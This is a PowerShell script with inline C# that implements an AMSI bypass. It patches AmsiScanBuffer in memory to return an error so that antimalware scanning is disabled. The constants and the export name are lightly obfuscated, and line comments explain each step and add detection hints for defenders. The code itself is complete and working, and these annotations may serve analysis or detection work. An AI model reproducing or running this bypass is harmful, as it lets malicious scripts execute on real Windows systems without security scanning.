- $Assem = ( # assembly references later handed to Add-Type (-ReferencedAssemblies) so the inline C# can compile
- "System, Version=4.0.0.0, Culture=neutral, PublickeyToken=b77a5c561934e089",
- "System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublickeyToken=b03f5f7f11d50a3a"
- ) # the next statement opens a here-string; everything up to the closing "@ is C# source text compiled at run time
- $Source = @"
- using System;
- using System.Runtime.InteropServices; // provides DllImport and Marshal used below
- namespace Bypass
- {
- public class AMSI // P/Invoke wrapper whose only action (Disable) overwrites the start of amsi.dll's AmsiScanBuffer in the calling process
- {
- [DllImport("kernel32")]
- public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); // resolves an exported function's address by name
- [DllImport("kernel32")]
- public static extern IntPtr LoadLibrary(string name); // returns a handle to the named module in this process
- [DllImport("kernel32")]
- public static extern IntPtr VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpfloldProtect); // changes page protection; Disable() ignores the result
- [DllImport("kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
- static extern void MoveMemory(IntPtr dest, IntPtr src, int size); // raw memory copy; used for the overwrite itself
- public static int Disable() // patches the scan function in the current process only; always returns 0 and checks no call result, so 0 does not mean the patch was applied
- {
- IntPtr TargetDLL = LoadLibrary("amsi.dll");
- IntPtr ASBPtr = GetProcAddress(TargetDLL, "Amsi" + "Scan" + "Buffer"); // export name is split so the literal never appears in the script text; detections should key on the normalized string or on the LoadLibrary/GetProcAddress/VirtualProtect combination, not the literal alone
- UIntPtr dwSize = (UIntPtr)(5 + 5) - 5; // evaluates to 5; a plain constant written as arithmetic
- uint Zero = (12 + 12) - 24; // evaluates to 0; reused below as the out slot for the previous protection value
- VirtualProtect(ASBPtr, dwSize, (0x40 + 0x40) - 0x40, out Zero); // 0x40 is PAGE_EXECUTE_READWRITE; the old value in Zero is never written back, so the page stays writable+executable - an RWX page inside amsi.dll's image is a memory-scan indicator
- //Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
- Byte[] Patch = new byte [6]; // filled element by element with the same six bytes as the commented-out initializer above
- Patch[0] = 0xB8; // B8 = mov eax, imm32; the next four bytes are the little-endian immediate
- Patch[1] = 0x57;
- Patch[2] = 0x00;
- Patch[3] = 0x07;
- Patch[4] = 0x80; // immediate is 0x80070057 (E_INVALIDARG)
- Patch[5] = 0xC3; // ret: the patched function returns the error code at once and scans nothing
- IntPtr unmanagedPointer = Marshal.AllocHGlobal(6); // unmanaged staging buffer; never released (no FreeHGlobal in this method)
- Marshal.Copy(new byte[] { Patch[0],Patch[1],Patch[2],Patch[3],Patch[4],Patch[5]}, 0, unmanagedPointer, 6);
- MoveMemory(ASBPtr, unmanagedPointer, 6); // overwrites the function entry; afterwards the in-memory bytes differ from amsi.dll on disk, which a memory-vs-disk integrity comparison can detect
- return 0;
- }
- }
- }
- "@
- add-Type -ReferencedAssemblies $Assem -TypeDefinition $Source -Language CSharp # compiles $Source and loads Bypass.AMSI into the session; nothing in this listing calls Disable(). Defender note: with script block logging enabled (event ID 4104) this whole text, P/Invoke declarations included, is recorded; NOTE(review): on Windows PowerShell, Add-Type C# compilation typically spawns csc.exe as a child process - confirm for the host version in use